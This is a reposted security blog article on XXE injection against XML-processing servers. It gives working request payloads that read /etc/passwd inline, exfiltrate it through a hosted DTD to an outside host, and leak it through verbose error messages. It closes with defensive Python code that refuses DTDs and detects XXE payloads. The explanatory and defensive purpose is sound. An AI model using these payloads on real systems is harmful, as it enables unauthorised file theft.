Original article: https://blog.netspi.com/forcing-xxe-reflection-server-error-messages/
XML External Entity (XXE) injection attacks are a simple way to extract files from a remote server via web requests. For easy use of XXE, the server response must include a reflection point that displays the injected entity (remote file) back to the client. Below is an example of a common XXE injection request and response. The injections have been bolded in red.
HTTP Request:
POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 288
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<search>name</search>
<value>&xxe;</value>
</root>
HTTP Response:
HTTP/1.1 200 OK
Content-Type: application/xml
Content-Length: 2467
<?xml version="1.0" encoding="UTF-8"?>
<errors>
<error>no results for name root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....
</error>
</errors>
However, it’s also very common for nothing to be returned in the error response if the application doesn’t reflect any user input back to the client. This makes simple XXE attacks harder. If the vulnerable server is allowed to make connections to remote systems, it’s possible to use an external DTD to extract local files via web requests. This technique has been covered in greater detail in this whitepaper, but below is an overview of how the modified XXE injection technique works and can be executed.
Host a .dtd file on a web server that is accessible from the vulnerable system. In my example the “netspi.dtd” file is hosted on xxe.netspi.com. The DTD file contains an XXE injection that will send the contents of the /etc/passwd file to the web server at http://xxe.netspi.com.
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY % external SYSTEM "http://xxe.netspi.com/x=%payload;">'> %param1; %external;
Next, the attack can be executed by referencing the hosted DTD file as shown below. The request does not even have to contain any XML body, as long as the server processes XML requests.
HTTP Request:
POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 139
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE foo SYSTEM "http://xxe.netspi.com/netspi.dtd">
<root>
<search>name</search>
</root>
At this point the XXE attack results in a connection to xxe.netspi.com to load the external DTD file. The hosted DTD file then uses parameter entities to wrap the contents of the /etc/passwd file into another HTTP request to xxe.netspi.com.
Now it may be possible to extract the contents of the /etc/passwd file without having a reflection point on the page itself, by reading the incoming traffic on xxe.netspi.com instead. The file contents can be parsed from the web server logs or from an actual page.
I should note that only a single line of /etc/passwd can be read using this method, or the HTTP request may fail altogether because of the line breaks in the target file, which end up inside the requested URL. There is another option though. In some cases it’s also possible to make data extraction easier by forcing an error on the server by adding an invalid URI to the request. Below is an example of a modified DTD:
<!ENTITY % payload SYSTEM "file:///etc/passwd">
<!ENTITY % param1 '<!ENTITY % external SYSTEM "file:///nothere/%payload;">'> %param1; %external;
If the server displays verbose errors to the client, the error may contain the contents of the file that’s being extracted. Below is an example:
HTTP Response:
HTTP/1.1 500 Internal Server Error
Content-Type: application/xml
Content-Length: 2467
<?xml version="1.0" encoding="UTF-8"?><root>
<errors>
<errorMessage>java.io.FileNotFoundException: file:///nothere/root:x:0:0:root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync....
The invalid file path causes a “FileNotFoundException”, and an error message that contains the /etc/passwd file contents. This same technique was recently covered in this Drupal XXE whitepaper as well, but since I already had this post written I thought I might as well publish it.
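The two payload shapes shown above (an inline entity declaration with a SYSTEM identifier, and a DOCTYPE that pulls in a hosted DTD) share one root cause: the XML parser accepts a DTD at all, so both the out-of-band variant and the error-based variant are stopped by the same control. The following is an added example, not NetSPI's code and not code from this blog. It uses Python's stdlib expat parser to refuse any DOCTYPE before a single entity is resolved, and pairs it with a classifier that labels incoming request bodies so that attempts can be logged and alerted on. The request bodies are constructed from the examples in the post (xxe.netspi.com is the post's own placeholder host); the function names classify, safe_parse and rejects are this example's own.

```python
"""Added example: refuse DTDs before XXE can occur, and label attempts for logging.

Not the original post's code. Covers both variants described in the post:
the inline <!ENTITY ... SYSTEM ...> payload and the external
<!DOCTYPE ... SYSTEM "http://..."> payload. Request bodies below are
constructed from the post's examples.
"""
import re
import xml.parsers.expat as expat


class XxeRejected(ValueError):
    """Raised when a document tries to use a DTD or an external entity."""


# Detection patterns for the two payload shapes the post shows.
_INLINE_ENTITY = re.compile(rb"<!ENTITY\s+%?\s*\w+\s+(?:SYSTEM|PUBLIC)\b", re.I)
_EXTERNAL_SUBSET = re.compile(rb"<!DOCTYPE\s+\S+\s+(?:SYSTEM|PUBLIC)\b", re.I)
_ANY_DOCTYPE = re.compile(rb"<!DOCTYPE\b", re.I)


def classify(body: bytes) -> str:
    """Label a request body for logging: which XXE shape, if any, it carries."""
    if _INLINE_ENTITY.search(body):
        return "inline-external-entity"   # <!ENTITY xxe SYSTEM "file:///etc/passwd">
    if _EXTERNAL_SUBSET.search(body):
        return "external-dtd"             # <!DOCTYPE foo SYSTEM "http://.../netspi.dtd">
    if _ANY_DOCTYPE.search(body):
        return "dtd-present"              # a DTD with no obvious external identifier
    return "clean"


def safe_parse(body: bytes) -> dict:
    """Parse a flat <root><tag>text</tag>...</root> body with DTDs disabled.

    expat is told never to process parameter entities, any DOCTYPE aborts the
    parse before its internal subset is read, and any external entity
    reference aborts as well. Returns {child element name: text}.
    """
    parser = expat.ParserCreate()
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_NEVER)

    def on_doctype(name, sysid, pubid, has_internal_subset):
        raise XxeRejected("DOCTYPE declarations are not accepted: %s" % name)

    def on_external_ref(context, base, sysid, pubid):
        raise XxeRejected("external entity reference refused: %s" % sysid)

    parser.StartDoctypeDeclHandler = on_doctype
    parser.ExternalEntityRefHandler = on_external_ref

    result, stack, text = {}, [], []

    def start(name, attrs):
        stack.append(name)
        text.clear()

    def chars(data):
        text.append(data)

    def end(name):
        stack.pop()
        if len(stack) == 1:              # element was a direct child of root
            result[name] = "".join(text).strip()

    parser.StartElementHandler = start
    parser.CharacterDataHandler = chars
    parser.EndElementHandler = end
    parser.Parse(body, True)
    return result


def rejects(body: bytes) -> bool:
    """True if safe_parse refuses the body (convenience for demos and tests)."""
    try:
        safe_parse(body)
    except XxeRejected:
        return True
    return False


# Constructed request bodies, modelled on the post's examples.
BENIGN = (b'<?xml version="1.0" encoding="UTF-8" ?>\n<root>\n'
          b'<search>name</search>\n<value>root</value>\n</root>')
INLINE_XXE = (b'<?xml version="1.0" encoding="UTF-8" ?>\n'
              b'<!DOCTYPE netspi [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>\n'
              b'<root>\n<search>name</search>\n<value>&xxe;</value>\n</root>')
EXTERNAL_XXE = (b'<?xml version="1.0" encoding="UTF-8" ?>\n'
                b'<!DOCTYPE foo SYSTEM "http://xxe.netspi.com/netspi.dtd">\n'
                b'<root>\n<search>name</search>\n</root>')

if __name__ == "__main__":
    for label, body in (("benign", BENIGN), ("inline", INLINE_XXE), ("external", EXTERNAL_XXE)):
        outcome = "rejected" if rejects(body) else safe_parse(body)
        print("%-8s %-24s %s" % (label, classify(body), outcome))
```

Refusing every DOCTYPE is the simplest policy and the one to prefer when the application never needs DTDs; the classifier exists so the refusal is not silent but shows up in logs as either the inline or the hosted-DTD variant. The same effect in a Java stack (which the post's FileNotFoundException trace points at) is obtained by setting the parser's disallow-doctype-decl feature to true before parsing.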